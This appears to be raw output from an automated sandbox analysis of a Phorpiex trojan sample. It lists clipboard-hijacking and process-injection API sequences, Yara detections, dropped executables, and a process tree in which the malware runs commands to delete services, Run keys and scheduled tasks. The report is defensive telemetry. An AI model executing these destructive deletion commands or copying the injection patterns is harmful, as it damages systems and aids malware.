    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00405A80 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,1_2_00405A80
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00404980 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,1_2_00404980
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_00404980 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,2_2_00404980
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_00404980 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,7_2_00404980
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00405A80 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,1_2_00405A80
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00405A80 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA,1_2_00405A80

    Spam, unwanted Advertisements and Ransom Demands

    barindex
    Yara detected Phorpiex
    Source: Yara matchFile source: Process Memory Space: 230053364.exe PID: 8652, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: sysludpvs.exe PID: 8672, type: MEMORYSTR
    Source: Yara matchFile source: Process Memory Space: sysludpvs.exe PID: 9076, type: MEMORYSTR

    System Summary

    barindex
    Malicious sample detected (through community Yara rule)
    Source: 00000008.00000002.1533636764.0000000000815000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
    Source: 00000008.00000002.1533636764.0000000000815000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
    Source: 00000009.00000002.1614530538.00000218E1C80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
    Source: 00000009.00000002.1614530538.00000218E1C80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
    Source: C:\Windows\sysludpvs.exeProcess Stats: CPU usage > 49%
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040D610 NtQuerySystemTime,RtlTimeToSecondsSince1980,1_2_0040D610
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040F235 NtQueryVirtualMemory,1_2_0040F235
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_0040D610 NtQuerySystemTime,RtlTimeToSecondsSince1980,2_2_0040D610
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_0040F235 NtQueryVirtualMemory,2_2_0040F235
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_0040D610 NtQuerySystemTime,RtlTimeToSecondsSince1980,7_2_0040D610
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_0040F235 NtQueryVirtualMemory,7_2_0040F235
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeCode function: 8_2_00401D58 NtAllocateVirtualMemory,8_2_00401D58
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeCode function: 8_2_00401D18 NtWriteVirtualMemory,8_2_00401D18
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeCode function: 8_2_004019D8 NtCreateThreadEx,8_2_004019D8
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeCode function: 8_2_00401D98 NtProtectVirtualMemory,8_2_00401D98
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeCode function: 8_2_00401C98 NtClose,8_2_00401C98
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeCode function: 13_2_00007FF7C6B00FD9 NtQuerySystemInformation,13_2_00007FF7C6B00FD9
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeCode function: 18_2_00007FF7C6B20FD9 NtQuerySystemInformation,18_2_00007FF7C6B20FD9
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeCode function: 23_2_00007FF7C6AE0FD9 NtQuerySystemInformation,23_2_00007FF7C6AE0FD9
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeCode function: 28_2_00007FF7C6AF0FD9 NtQuerySystemInformation,28_2_00007FF7C6AF0FD9
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeCode function: 33_2_00007FF7C6AF0F39 NtQuerySystemInformation,33_2_00007FF7C6AF0F39
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeCode function: 40_2_00007FF7C6B006BA NtQuerySystemInformation,40_2_00007FF7C6B006BA
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeCode function: 40_2_00007FF7C6B00FD9 NtQuerySystemInformation,40_2_00007FF7C6B00FD9
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeCode function: 45_2_00007FF7C6B20F11 NtQuerySystemInformation,45_2_00007FF7C6B20F11
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeCode function: 54_2_00007FF7C6B106BA NtQuerySystemInformation,54_2_00007FF7C6B106BA
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeCode function: 54_2_00007FF7C6B10FD9 NtQuerySystemInformation,54_2_00007FF7C6B10FD9
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeFile created: C:\Windows\sysludpvs.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040A6701_2_0040A670
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_004040901_2_00404090
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00407C901_2_00407C90
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00407CB91_2_00407CB9
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040EFF81_2_0040EFF8
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_004049801_2_00404980
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_0040A6702_2_0040A670
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_004040902_2_00404090
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_00407C902_2_00407C90
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_00407CB92_2_00407CB9
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_0040EFF82_2_0040EFF8
    Source: C:\Windows\sysludpvs.exeCode function: 2_2_004049802_2_00404980
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_0040A6707_2_0040A670
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_004040907_2_00404090
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_00407C907_2_00407C90
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_00407CB97_2_00407CB9
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_0040EFF87_2_0040EFF8
    Source: C:\Windows\sysludpvs.exeCode function: 7_2_004049807_2_00404980
    Source: C:\Windows\System32\conhost.exeCode function: 9_2_00000218E1C843069_2_00000218E1C84306
    Source: C:\Windows\System32\conhost.exeCode function: 9_2_00000218E1C846D69_2_00000218E1C846D6
    Source: C:\Windows\System32\conhost.exeCode function: 9_2_00000218E1C84F6A9_2_00000218E1C84F6A
    Source: C:\Windows\System32\conhost.exeCode function: 9_2_00000218E1C836D29_2_00000218E1C836D2
    Source: C:\Windows\System32\conhost.exeCode function: 9_2_00000218E1C84B0E9_2_00000218E1C84B0E
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 9208 -s 944
    Source: 2047112978.exe.5.drStatic PE information: No import functions for PE file found
    Source: 2052810334.exe.5.drStatic PE information: No import functions for PE file found
    Source: 396820397.exe.5.drStatic PE information: No import functions for PE file found
    Source: 393932919.exe.5.drStatic PE information: No import functions for PE file found
    Source: 5[1].exe.5.drStatic PE information: No import functions for PE file found
    Source: 4[1].exe.5.drStatic PE information: No import functions for PE file found
    Source: 11[1].exe.5.drStatic PE information: No import functions for PE file found
    Source: 3[1].exe.5.drStatic PE information: No import functions for PE file found
    Source: 6[1].exe.5.drStatic PE information: No import functions for PE file found
    Source: 2[1].exe.5.drStatic PE information: No import functions for PE file found
    Source: 7[1].exe.5.drStatic PE information: No import functions for PE file found
    Source: 2028814805.exe.5.drStatic PE information: No import functions for PE file found
    Source: 417928448.exe.5.drStatic PE information: No import functions for PE file found
    Source: 10[1].exe.5.drStatic PE information: No import functions for PE file found
    Source: 8[1].exe.5.drStatic PE information: No import functions for PE file found
    Source: 399630275.exe.5.drStatic PE information: No import functions for PE file found
    Source: 203235335.exe.5.drStatic PE information: No import functions for PE file found
    Source: a0RkmvhSaf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
    Source: 00000008.00000002.1533636764.0000000000815000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
    Source: 00000008.00000002.1533636764.0000000000815000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
    Source: 00000009.00000002.1614530538.00000218E1C80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
    Source: 00000009.00000002.1614530538.00000218E1C80000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
    Source: 2028814805.exe, 00000021.00000002.1820333386.0000000000BD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBP
    Source: classification engineClassification label: mal100.troj.evad.winEXE@102/45@2/82
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_00406D30 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread,1_2_00406D30
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeCode function: 1_2_0040DC20 SysAllocString,CoCreateInstance,SysFreeString,1_2_0040DC20
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\newtpp[1].exeJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8628:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1600:120:WilError_03
    Source: C:\Windows\sysludpvs.exeMutant created: \Sessions\1\BaseNamedObjects\k993947s89
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeMutant created: NULL
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2828:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5444:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2484:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3348:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9172:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3868:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8464:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6140:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6824:120:WilError_03
    Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess9208
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeFile created: C:\Users\user\AppData\Local\Temp\230053364.exeJump to behavior
    Source: a0RkmvhSaf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeSystem information queried: HandleInformation
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: a0RkmvhSaf.exeVirustotal: Detection: 83%
    Source: a0RkmvhSaf.exeReversingLabs: Detection: 78%
    Source: unknownProcess created: C:\Users\user\Desktop\a0RkmvhSaf.exe "C:\Users\user\Desktop\a0RkmvhSaf.exe"
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeProcess created: C:\Users\user\AppData\Local\Temp\230053364.exe C:\Users\user\AppData\Local\Temp\230053364.exe
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeProcess created: C:\Windows\sysludpvs.exe C:\Windows\sysludpvs.exe
    Source: C:\Windows\sysludpvs.exeProcess created: C:\Users\user\AppData\Local\Temp\152942395.exe C:\Users\user\AppData\Local\Temp\152942395.exe
    Source: unknownProcess created: C:\Windows\sysludpvs.exe "C:\Windows\sysludpvs.exe"
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\634722489.exe C:\Users\user\AppData\Local\Temp\634722489.exe
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" ""
    Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 9208 -s 944
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\2052810334.exe C:\Users\user\AppData\Local\Temp\2052810334.exe
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "Windows Services"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /f
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\417928448.exe C:\Users\user\AppData\Local\Temp\417928448.exe
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinSrvcsDrv" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinSrvcsDrv"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\2047112978.exe C:\Users\user\AppData\Local\Temp\2047112978.exe
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinUpla" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpla" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinUpla"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpla" /f
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\399630275.exe C:\Users\user\AppData\Local\Temp\399630275.exe
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinSrvcsDrv" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinSrvcsDrv"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\2028814805.exe C:\Users\user\AppData\Local\Temp\2028814805.exe
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\2028814805.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Service"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Service" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Service"
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\393932919.exe C:\Users\user\AppData\Local\Temp\393932919.exe
    Source: C:\Users\user\AppData\Local\Temp\393932919.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinDrvUpd" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDrvUpd" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinDrvUpd"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinDrvUpd" /f
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\1216017805.exe C:\Users\user\AppData\Local\Temp\1216017805.exe
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Users\user\AppData\Local\Temp\1216017805.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /delete /f /tn "Windows Upgrade Manager"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Windows Upgrade Manager" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\38822795.exe C:\Users\user\AppData\Local\Temp\38822795.exe
    Source: C:\Users\user\AppData\Local\Temp\38822795.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinUpdt" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinUpdt"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpdt" /f
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\396820397.exe C:\Users\user\AppData\Local\Temp\396820397.exe
    Source: C:\Users\user\AppData\Local\Temp\396820397.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinMngr" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinMngr"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinMngr" /f
    Source: C:\Users\user\Desktop\a0RkmvhSaf.exeProcess created: C:\Users\user\AppData\Local\Temp\230053364.exe C:\Users\user\AppData\Local\Temp\230053364.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\230053364.exeProcess created: C:\Windows\sysludpvs.exe C:\Windows\sysludpvs.exeJump to behavior
    Source: C:\Windows\sysludpvs.exeProcess created: C:\Users\user\AppData\Local\Temp\152942395.exe C:\Users\user\AppData\Local\Temp\152942395.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\634722489.exe C:\Users\user\AppData\Local\Temp\634722489.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\2052810334.exe C:\Users\user\AppData\Local\Temp\2052810334.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\417928448.exe C:\Users\user\AppData\Local\Temp\417928448.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\2047112978.exe C:\Users\user\AppData\Local\Temp\2047112978.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\399630275.exe C:\Users\user\AppData\Local\Temp\399630275.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\2028814805.exe C:\Users\user\AppData\Local\Temp\2028814805.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\393932919.exe C:\Users\user\AppData\Local\Temp\393932919.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\1216017805.exe C:\Users\user\AppData\Local\Temp\1216017805.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\38822795.exe C:\Users\user\AppData\Local\Temp\38822795.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Users\user\AppData\Local\Temp\396820397.exe C:\Users\user\AppData\Local\Temp\396820397.exeJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: unknown unknownJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\152942395.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /fJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\634722489.exeProcess created: C:\Windows\System32\conhost.exe "C:\Windows\System32\conhost.exe" ""Jump to behavior
    Source: C:\Users\user\AppData\Local\Temp\2052810334.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "Windows Services" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /fJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "Windows Services" Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\Windows Services" /fJump to behavior
    Source: C:\Users\user\AppData\Local\Temp\417928448.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinSrvcsDrv" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinSrvcsDrv"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Users\user\AppData\Local\Temp\2047112978.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinUpla" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpla" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinUpla"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinUpla" /f
    Source: C:\Users\user\AppData\Local\Temp\399630275.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c sc delete "WinSrvcsDrv" & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc delete "WinSrvcsDrv"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WinSrvcsDrv" /f
